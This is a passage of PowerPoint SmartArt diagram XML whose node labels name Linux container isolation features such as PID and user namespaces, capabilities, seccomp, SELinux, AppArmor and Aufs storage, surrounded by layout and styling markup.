          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Device</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1385EB2D-FB81-4D55-BE5D-44283FF7DAF6}" type="parTrans" cxnId="{A9716BED-9DAC-49D2-9AFC-3DF9587927C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFA20DD0-6050-486A-AB38-2F8F9225834A}" type="sibTrans" cxnId="{A9716BED-9DAC-49D2-9AFC-3DF9587927C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5720833B-25DC-474B-BC4B-BE3EBF0F9BE8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>PID</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DE263CE-4062-4D24-A2A0-7BE3C5615DAF}" type="sibTrans" cxnId="{168B3EDB-CC20-4840-AB85-CEC66ECDFF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{560374E7-197C-4123-9F66-8A461BCBF9C1}" type="parTrans" cxnId="{168B3EDB-CC20-4840-AB85-CEC66ECDFF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF5B84DF-553E-4EEA-8B4F-86D02FA96E5A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Security</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C616E6A-A02F-48C0-A44F-F16EEA04A424}" type="parTrans" cxnId="{EA68FE2D-5FED-4F44-86AC-D0EAA510CF1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F280F600-7E5D-4CFC-B42A-299CBF32880A}" type="sibTrans" cxnId="{EA68FE2D-5FED-4F44-86AC-D0EAA510CF1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A186CC1-BD45-4AE6-BE75-2E345A9F5B43}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Capabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30341EB1-A5A7-4C0C-9804-D158D0CA62FD}" type="parTrans" cxnId="{26732EFD-C79B-4358-9EAE-D8663F7B7C34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{879A265B-1570-43A4-BB99-12DEBC55C5D3}" type="sibTrans" cxnId="{26732EFD-C79B-4358-9EAE-D8663F7B7C34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93D1CFF2-A5F9-4CC1-A45E-2694267F6C95}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Seccomp</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95812017-0B8E-4EB8-8134-7DE8A62CAAD0}" type="parTrans" cxnId="{D8E41ACF-A800-4A3B-AB30-4CFF9CA5EBEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EB6D26F-7EF7-4AB8-A18D-ED027EFE0B00}" type="sibTrans" cxnId="{D8E41ACF-A800-4A3B-AB30-4CFF9CA5EBEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D0821A2-692D-4623-9674-83E1A1DC5B47}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>SELinux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FDDEF26-78F9-4000-9151-C51058ECCFDD}" type="parTrans" cxnId="{2E551E21-812D-43A7-9566-7BE81F44EB5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{703E7969-2BCC-49E2-A22B-B0450F52703F}" type="sibTrans" cxnId="{2E551E21-812D-43A7-9566-7BE81F44EB5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2E702EB-61A2-45BC-BFF3-CA1CB09AF24D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>AppArmor</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB09B976-F585-4BF4-B02A-9ED1B3E558AB}" type="parTrans" cxnId="{C57F7888-E738-4F2E-B7E7-377E18F74CE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF92CB18-135D-4660-B2A6-8E116C11AFFC}" type="sibTrans" cxnId="{C57F7888-E738-4F2E-B7E7-377E18F74CE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Storage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DD49B71-A4B8-4525-A74F-D4CB8A486CFA}" type="sibTrans" cxnId="{0C3C0EDC-EA54-444D-8A29-E00E327BDF7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{650E6585-D98C-4861-BCCA-60882A51B92F}" type="parTrans" cxnId="{0C3C0EDC-EA54-444D-8A29-E00E327BDF7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0B8EA53-BF56-42F4-AC13-46C06C08C8C1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>User</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C506AC9B-A08C-4C4D-8545-A004502A691F}" type="parTrans" cxnId="{A3AA84A7-82BF-48CE-B7B7-13CCF4CF9FF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95355D91-FA21-49D3-83A7-629DDC916D6D}" type="sibTrans" cxnId="{A3AA84A7-82BF-48CE-B7B7-13CCF4CF9FF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9F92858-7F48-4B01-B69D-353226BC13C9}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>Aufs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9F319E0-9BBF-4DDC-9940-27054B2A02D5}" type="parTrans" cxnId="{985802D9-601C-470C-861F-B4E7C6491141}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EA8EE19-290A-465C-9FFA-15A75F81C11B}" type="sibTrans" cxnId="{985802D9-601C-470C-861F-B4E7C6491141}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" type="pres">
      <dgm:prSet presAssocID="{0ABF6E7A-4AF7-4A54-84D4-3CEEF8EA9E5B}" presName="theList" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FE7B954-E856-4893-8A09-00B84312DF0A}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30CE6A75-3FF8-4194-99FE-9831B266366F}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A32E4856-A4AD-46CF-84A8-3D668486E544}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDB489C2-AB41-495E-B2D1-24579A6FCFC1}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1E0C623-0471-415F-B290-194C00372F81}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12D643E0-AF48-4183-BB35-81B6A0C9602C}" type="pres">
      <dgm:prSet presAssocID="{42C962FC-1D78-43BA-B0CF-137A2840F445}" presName="childNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D9E89F8-0476-40AA-B726-89F90EA1EE51}" type="pres">
      <dgm:prSet presAssocID="{42C962FC-1D78-43BA-B0CF-137A2840F445}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B22F2000-CB74-453E-B358-5701BFC71E06}" type="pres">
      <dgm:prSet presAssocID="{B9F92858-7F48-4B01-B69D-353226BC13C9}" presName="childNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A91538A2-C9D2-43A7-83AD-664ECBE124F3}" type="pres">
      <dgm:prSet presAssocID="{B9F92858-7F48-4B01-B69D-353226BC13C9}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{842C65AE-1601-4DFE-91A4-DE6A3AA19EB9}" type="pres">
      <dgm:prSet presAssocID="{4A71EB0B-D69A-44D8-97C1-8BAE0C986272}" presName="childNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1642BF6E-B815-49CA-9D8D-A3EDC0FA3181}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="aSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24F39EA9-872B-4793-A06E-B269342C502A}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBB82117-9837-4D37-BC7F-DB3F82D556BC}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4" custLinFactNeighborX="0" custLinFactNeighborY="2602"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2912360F-2CE9-41DD-84E2-A113FA90909C}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{217AA398-71F8-4B52-A94D-F9B649FB41A0}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7072083A-8581-4329-9DA0-477B82581EDE}" type="pres">
      <dgm:prSet presAssocID="{5720833B-25DC-474B-BC4B-BE3EBF0F9BE8}" presName="childNode" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDBCD22F-3FDD-4D77-B533-DE9FA35276C6}" type="pres">
      <dgm:prSet presAssocID="{5720833B-25DC-474B-BC4B-BE3EBF0F9BE8}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16C8F441-0E86-4BA4-8205-623AF8A01764}" type="pres">
      <dgm:prSet presAssocID="{B0B8EA53-BF56-42F4-AC13-46C06C08C8C1}" presName="childNode" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E87DB7A6-E225-4EC0-8FB8-1087809CBFA2}" type="pres">
      <dgm:prSet presAssocID="{B0B8EA53-BF56-42F4-AC13-46C06C08C8C1}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D9DE7586-6054-4E01-82D6-6CA481C824AF}" type="pres">
      <dgm:prSet presAssocID="{F7629425-DF99-4D3C-8DCA-869B9EFE16C0}" presName="childNode" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BAC1984-F7DB-448A-9A0E-122747079244}" type="pres">
      <dgm:prSet presAssocID="{F7629425-DF99-4D3C-8DCA-869B9EFE16C0}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4EEEF414-5E73-42B1-80EC-B52F54E5145E}" type="pres">
      <dgm:prSet presAssocID="{ABA39408-5CF8-44FF-A5EE-E3B86003C438}" presName="childNode" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D52C5E6E-E7C1-4988-B938-98D7B6AFD8A1}" type="pres">
      <dgm:prSet presAssocID="{ABA39408-5CF8-44FF-A5EE-E3B86003C438}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A8EAC8B-62AB-4CCE-8A50-0E3B8EC18EA9}" type="pres">
      <dgm:prSet presAssocID="{7AD760EE-BC2F-4251-9A86-BC65A6891C47}" presName="childNode" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B0F154E-5D84-40E0-814D-2D5CCAAE98CE}" type="pres">
      <dgm:prSet presAssocID="{7AD760EE-BC2F-4251-9A86-BC65A6891C47}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DCE4E765-3C65-4E4E-AB52-2A237FE0C3AC}" type="pres">
      <dgm:prSet presAssocID="{535AD3BE-3F4B-4348-A006-6732B1DA278A}" presName="childNode" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5652E85C-FE3E-406F-821C-3E2BB419D688}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="aSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89FF70DB-3245-4090-9DD7-140609F183D5}" type="pres">
      <dgm:prSet presAssocID="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2AE096B0-E6DB-4467-AFE8-90C18B3946CD}" type="pres">
      <dgm:prSet presAssocID="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD020586-959D-4655-A68D-1FCA2B8A2C2E}" type="pres">
      <dgm:prSet presAssocID="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD1E57F3-2AF9-4C0A-8DD3-29E7D85AFC55}" type="pres">
      <dgm:prSet presAssocID="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" type="pres">
      <dgm:prSet presAssocID="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EAF9D065-4A1A-487B-8034-89DC20147E9F}" type="pres">
      <dgm:prSet presAssocID="{37B428CA-8910-41D5-84E0-19ADAFD89D7C}" presName="childNode" presStyleLbl="node1" presStyleIdx="9" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A77496CE-3FAA-4E9F-AC35-C52715DD80A1}" type="pres">
      <dgm:prSet presAssocID="{37B428CA-8910-41D5-84E0-19ADAFD89D7C}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DE26DBA6-60A8-4CCA-85C8-D71573485800}" type="pres">
      <dgm:prSet presAssocID="{879232AE-EBB8-4D24-A29B-DAB7F76442BC}" presName="childNode" presStyleLbl="node1" presStyleIdx="10" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91BB4A79-DF33-4DD4-9818-43EE4F124C81}" type="pres">
      <dgm:prSet presAssocID="{879232AE-EBB8-4D24-A29B-DAB7F76442BC}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DDE998AB-26DA-4751-B5BE-A52201553888}" type="pres">
      <dgm:prSet presAssocID="{8E0F7C7D-5750-42D3-A222-8AB979E3895A}" presName="childNode" presStyleLbl="node1" presStyleIdx="11" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
